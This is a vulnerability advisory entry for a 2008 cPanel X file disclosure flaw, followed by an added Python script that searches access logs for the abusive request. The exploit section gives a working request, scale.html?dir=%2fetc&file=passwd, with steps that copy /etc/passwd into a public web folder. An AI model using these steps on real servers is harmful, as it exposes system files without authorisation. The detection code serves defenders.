Cpanel X File Disclosure Vulnerability

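Vulnerability ID 1052550 Vulnerability type
Published 2008-08-23 Updated 2008-08-23
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2008080065
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit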
#
# Cpanel X File Disclosure Vulnerability
# 
#       Tested on cPanel Version 11.23.4-RELEASE
#       other versions might be affected
#
# Found By : Encrypt3d.M!nd
#              encrypt3d.blogspot.com
#
####################################################################################
# Description :

Cpanel X suffers from a file disclosure vulnerability which lets an attacker read files
that he has no permission to read, for example /etc/passwd.

# Exploit :
You must have permission to access the Cpanel.
Log in and go to:

"site.com:2082/frontend/x3/cpanelpro/scale.html?dir=%2fetc&file=passwd"
to read /etc/passwd

Then click on "Retain a copy of the old image as" and type a path inside your account,
for example: "/home/user/public_html/passwd"
Note: passwd is a file, not a directory.
Then click on "Scale Image".
Then go to "http://yoursite.com/passwd" in your browser.
You will see the contents of /etc/passwd.
 
# End
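
For defenders, the request pattern above can be searched for in cPanel access logs. The following is an added example, not part of the original advisory or of cPanel: it flags scale.html requests whose dir/file parameters resolve outside the logged-in user's home directory. The log layout (combined-log style with the authenticated user in the third field), the /home/<user> home layout, the sample lines and all function names are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: combined-log-style lines, authenticated cPanel user in field 3.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "[A-Z]+ (?P<uri>\S+) [^"]*"')
SCALE_RE = re.compile(r'^/frontend/[^/]+/cpanelpro/scale\.html$')

# Constructed sample lines (documentation IP ranges, made-up users).
SAMPLE_LOG = [
    '203.0.113.7 - alice [23/Aug/2008:10:00:01 +0000] "GET /frontend/x3/'
    'cpanelpro/scale.html?dir=%2fhome%2falice%2fpublic_html&file=logo.png'
    ' HTTP/1.1" 200 5120',
    '203.0.113.7 - alice [23/Aug/2008:10:00:09 +0000] "GET /frontend/x3/'
    'cpanelpro/scale.html?dir=%2fetc&file=passwd HTTP/1.1" 200 4210',
    '198.51.100.4 - bob [23/Aug/2008:10:01:30 +0000] "GET /frontend/x3/'
    'index.html HTTP/1.1" 200 900',
]


def resolve(dir_, file_, home):
    """Normalise dir + file to one absolute path; relative dirs start at home."""
    base = dir_ if dir_.startswith('/') else posixpath.join(home, dir_)
    return posixpath.normpath(posixpath.join(base, file_))


def suspicious_scale_requests(lines, home_root='/home'):
    """Return (ip, user, path) for scale.html requests that leave the user's home."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        url = urlsplit(m['uri'])
        if not SCALE_RE.match(url.path):
            continue
        query = parse_qs(url.query, keep_blank_values=True)  # decodes %2f
        home = posixpath.join(home_root, m['user'])  # assumed home layout
        target = resolve(query.get('dir', [''])[0],
                         query.get('file', [''])[0], home)
        if target != home and not target.startswith(home + '/'):
            findings.append((m['ip'], m['user'], target))
    return findings


if __name__ == '__main__':
    for finding in suspicious_scale_requests(SAMPLE_LOG):
        print('outside home:', finding)
```

Requests sent as POST carry the parameters in the body and will not appear in the request line, so this check covers only the GET form shown in the advisory.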